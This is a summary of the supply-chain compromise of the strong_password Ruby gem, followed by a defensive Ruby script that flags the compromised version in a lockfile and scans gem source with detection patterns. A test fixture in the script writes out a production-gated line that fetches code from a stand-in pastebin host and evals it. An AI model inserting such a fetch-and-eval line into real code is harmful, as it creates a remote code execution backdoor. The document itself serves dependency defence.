The strong_password Ruby gem was found to carry a remote code execution vulnerability, CVE-2019-13354, after an attacker who had compromised account access rights published a malicious version of the gem. The malicious version appeared on RubyGems.org six months after the previous release, with no matching source code changes. The malicious 0.0.7 version activates only when the host application is running in production: it fetches a further payload from pastebin.com and evaluates it, giving the attacker remote command execution and reporting the URL of the running application. The RubyGems community responded quickly, removed the malicious version and assigned a CVE. The incident highlights the risk of supply-chain attacks and the importance of monitoring dependencies and acting swiftly when a compromise is discovered.
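An added example, not code from the original article or from the gem itself, of the kind of dependency check the closing sentence calls for: it parses a Gemfile.lock and flags a pinned strong_password 0.0.7, and scans gem source for the pattern described above (remote content fetched and passed to eval behind a production check). The names COMPROMISED, parse_lockfile and suspicious? are assumptions, and the lockfile and source fixtures are constructed.

```ruby
# Added example (not code from the original article or the gem): parse a
# Gemfile.lock, flag pinned versions known to be compromised, and scan gem
# source for the payload shape described above (remote content fed to eval).
require "set"
# strong_password 0.0.7 is from the incident; extend from your own advisory feed.
COMPROMISED = { "strong_password" => Set["0.0.7"] }.freeze
# Parse the GEM section of a Gemfile.lock into { name => resolved version }.
def parse_lockfile(text)
  specs = {}
  in_gem = false
  text.each_line do |line|
    if line.start_with?("GEM")
      in_gem = true
    elsif line =~ /\A\S/                        # another top-level section
      in_gem = false
    elsif in_gem && line =~ /\A {4}(\S+) \((\S+)\)/
      specs[$1] = $2                            # 4-space indent = spec line
    end
  end
  specs
end

def compromised_pins(specs)
  specs.select { |name, ver| COMPROMISED.fetch(name, Set.new).include?(ver) }
end

# A remote fetch plus eval is the signal; a production gate alone is not.
def suspicious_indicators(source)
  flags = []
  flags << :remote_fetch if source =~ /Net::HTTP|open-uri|URI\.open/
  flags << :dynamic_eval if source =~ /\b(eval|instance_eval|class_eval)\(/
  flags << :production_gate if source =~ /Rails\.env\.production\?|RAILS_ENV/
  flags
end
def suspicious?(source)
  (%i[remote_fetch dynamic_eval] - suspicious_indicators(source)).empty?
end

# Constructed fixtures, not the real lockfile or gem code; never executed.
SAMPLE_LOCK = <<~LOCK
  GEM
    specs:
      rack (2.0.7)
      strong_password (0.0.7)

  PLATFORMS
    ruby
LOCK
SAMPLE_BAD = "if Rails.env.production?\n" \
  "  eval(Net::HTTP.get(URI('https://pastebin.invalid/raw/PLACEHOLDER')))\nend\n"
```

Run `compromised_pins(parse_lockfile(File.read("Gemfile.lock")))` in CI and `suspicious?` over each installed gem's `.rb` files; a hit on the second check is a prompt to diff the installed gem against its source repository, as the release gap in this incident would have suggested.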